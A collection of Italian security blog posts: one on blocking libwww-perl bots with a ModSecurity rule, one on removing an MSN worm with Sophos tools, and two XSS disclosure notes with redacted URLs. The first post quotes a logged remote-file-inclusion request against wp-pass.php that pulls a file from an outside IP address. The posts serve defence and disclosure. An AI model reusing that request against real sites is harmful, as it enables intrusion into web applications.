Donncha ha rilasciato un post dal titolo "tenere lontani i libwww-perl bot " usando il mod_rewrite e bloccando lo HTTP_USER_AGENT per prevenire attacchi. Questo comunque non sembra funzionare. Il perché è presto detto, E' semplice cambiare la stringa dello HTTP_USER_AGENT e l'attacco che si potrebbe verificare potrebbe non usare una stringa relativa allo user-agent standard quale libwww-perl user-agent . Inoltre, le possibilità che delegittimiate la lettura del vostro feed e di altri strumenti web che hanno accesso al vostro blog sono davvero tante. Donncha’s mostra un esempio di questo attacco:

GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? …
“libwww-perl/5.805″

Questa richiesta sembrerebbe provare ad eseguire l'exploit tramite un RFI (Remote File Inclusion vulnerability) . Ma a quanto confermano BlogWatch e altri non sembrerebberi esserci vulnerabilità del genere sulla piattaforma Wordpress al momento. Potrei pensare ad un bug nei vari themes/templates oppure nei plugin installati e disponibili online ma sul solo wp e sul file incriminato wp-pass.php non sembrano esserci bugs di questo tipo. Alcune regole per tenere lontani questi bot potete trovarle all'interno di questa pagina Comunque un altro modo per poter prevenire gli attacchi potrebbe avvenire attraverso l'uso di un firewall per Apache open source chiamato ModSecurity. La regola, poi, dovrebbe essere la seguente:

SecFilterSelective REQUEST_URI "wp-pass.php?_wp_http_referer"

Naturalmente se dipendete da librerie libwww-perl non usate queste regole altrimenti potreste ritrovarvi con il blog non più funzionante.
Tags: Hacks, Internet, Web, WebServer, sicurezza

Questo worm si sta diffondendo su MSN molto rapidamente. Si viene contattati da frasi allusive del tipo: you care if i put this pictuer of you in my new album? haha lets hope your parents dont see this picture of you can i up some of these pics of ya to my myspace profile? This picture isn't you, right? Se avete decompresso ed eseguito il file che seguiva alle scritte img_1123.rar allora sappiate che siete stati infettati. La prima cosa da fare è avvisare tutti i contatti di msn dicendo loro di NON ACCETTARE quel file da voi inviato perché contiene il worm in questione. Il secondo passo è il seguente, scaricate questo file compresso, contentente un tool di rimozione virus della sophos con incluso all'interno la .ide che vi serve(una libreria necessaria alla rimozione del suddetto worm). Ho creato un file al0ha.bat che vi permetterà di eseguire facilmente il tool di rimozione automaticamente ovvero senza aprire shell di comando. Chi vuole eseguire la procedura automaticamente seguisse questi passi. Scarica al0ha.bat Scarica IDE Sophos Scarica Tool Sophos Scaricate tutti questi files, decomprimeteli tutti nella stessa cartella che chiamerete antiworm, copiateci all'interno anche al0ha.bat.Ora cliccate con il destro su risorse del computer e Disattivate il ripristino automatico del sistema. Applicate le impostazioni e riavviate la macchina in modalità provvisoria (premendo F8 qualche secondo prima dell'avvio di windows) Scegliete Modalità provvisoria. Una volta entrati in modalità provvisoria da amministratori,

1)aprite la cartella antiworm 2)cliccate due volte (eseguendo) il file chiamato al0ha.bat. 3) Seguite il tool di rimozione fino ad operazione ultimata e riavviate SEMPRE in modalità provvisoria. 4) Ripetete il procedimento e se non è stato trovato nulla questa volta riavviate in modalità Normale. A questo punto dovreste essere completamente puliti e potrete Riattivare il Servizio di ripristino disabilitato in precedenza. Il worm si diffonde solo tramite msn ma anche skype sembra non esserne immune... Questa soluzione è valida naturalmente solo per sistemi Windows. Le persone che mi hanno contattato e spinto a scrivere questo articolo, erano possessori di questo sistema operativo. :( Per tutti gli altri sistemi operativi la procedura da seguire la trovate quì. English Version X Luis :) Man, follow those steps: 1) Download all those files Download al0ha.bat Download IDE Sophos Download Tool Sophos Once you've done this 2) Extract Tool Sophos in one folder (double click on it). 3) Copy also IDE file and al0ha.bat in THAT directory. You'll have this result folder:

 

 

 

4) Now, go to the control panel

-> Open System.

 

5) Disable the system restore function.

 

6) Apply changes.

 

7) Reboot Your System and go to SAFE BOOT. (Press F8 Key before loading WindowsXP)

 

8) Enter in your system in safe mode.

 

9) Once you've done this open the folder that you created before that contains all files you needs.

 

 

10) Execute al0ha.bat (double click on it)

 

11) Wait until the process will complete scanning and removing.

 

***If al0ha.bat doesn't function, go to the command line (Start->Execute->cmd.exe) ***Move to your ANTIWORM DIRECTORY (Example-> cd c:\antiworm) ***NOW Digit: SAV32CLI.exe -REMOVE -P=c:\log.txt ***wait until the end of the process. 12) Now, reboot your system in normal way. 13) Repeat this scan in your system again. 14) If you don't find any other file infected with this worm , enable system restore again. Hope that this could help you in solve your problem with this worm.
Tags: Hacks, Software, Windows, sicurezza, MaC, Opera, Web

Dopo circa una ventina di giorni dall'avviso di pubblicazione, ecco quì una prima Disclosure. Dopo la prima mail spedita in data 4 Luglio 2007 e la seconda in data 18 Luglio 2007 Hi all wikio staff! I report for the second time this bug that i found on the XXXXX page that allows XSS attacks like hijacking, phishing and cookies grabbing. The bug is located here: XXXXX PAGE. Exactly: http://www.wikio.it/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Hope that this was usefull to you in the way to fix it as soon as you can. Best regards, A cui faceva seguito la Disclosure Policy. (Il contenuto ribadisce la pericolosità e in questo caso anche il codice della vulnerabilità incriminata, dando la possibilità allo staff del servizio in questione di procedere direttamente al fix) Visto che non ho ricevuto risposta alcuna anche a questa seconda email e considerato che il problema non sembra ancora essere stato fixato ( al momento in cui vi parlo il bug persiste sul sito del social network) ho deciso di pubblicare questa prima Disclosure. AGGIORNAMENTO Dopo aver postato questo articolo, questa mattina sono stato celermente contattato dal responsabile italiano di Wikio (che ringrazio), il quale mi ha subito rassicurato che in breve tempo il bug segnalato sarà corretto.

Il bug potrebbe permettere ad un attaccante di rubare le credenziali di accesso di un numero elevato di utenti, redirettarli su una pagina contenente del codice malizioso oppure potrebbe eseguire degli attacchi di phishing sempre con l'intento di rubare le passwords o altro. Spesso si sottovaluta questo genere di bugs ma così facendo si commette un grave errore. Su siti come i nuovi social network (e il servizio in questione ne è un esempio), si forgiano worm che sfruttano bug di questo genere per proliferare ed infettare più computer possibili in modo semplice e silenzioso, sfruttando anche la reputazione del social network o del sito stesso. (A tal proposito vi segnalo un video dimostrativo che mostra la pericolosità di worm basati su XSS di Rosario Valotta) Non avendo ancora provveduto a risolvere il problema, WIKIO pone gli utenti in una situazione molto pericolosa soprattutto considerando le ultime vulnerabilità di Firefox 2.0.0.5 e Safari. Mi sembra un atteggiamento irresponsabile che un servizio tanto importante quanto diffuso possa ignorare problematiche di questo tipo, ma gli utenti devono essere informati perché è in gioco la loro privacy. Stay Tuned. Ora dopo aver aspettato il rilascio della versione 2.0.0.6 di firefox rilascio questa prima disclosure.
Tags: Coding, Hacks, I-Code, XSS e XSF, sicurezza, socialbookmarking

Ieri, navigando su un importante sito di social networking internazionale, ho scoperto alcune pericolose vulnerabilità XSS al suo interno. Ho notificato la vulnerabilità allo staff del servizio in questione e reputando la vulnerabilità scoperta molto rischiosa (cookie grabbing, user informations disclosure, hijacking) preferisco evitare un post al riguardo almeno fino a quando non riceverò risposta alla notifica.

Ho registrato anche alcuni video che dimostrano la vulnerabilità ma per il momento sono offline.

Stay Tuned.

Antonio.

Tags: Coding, Hacks, Internet, XSS e XSF, web2.0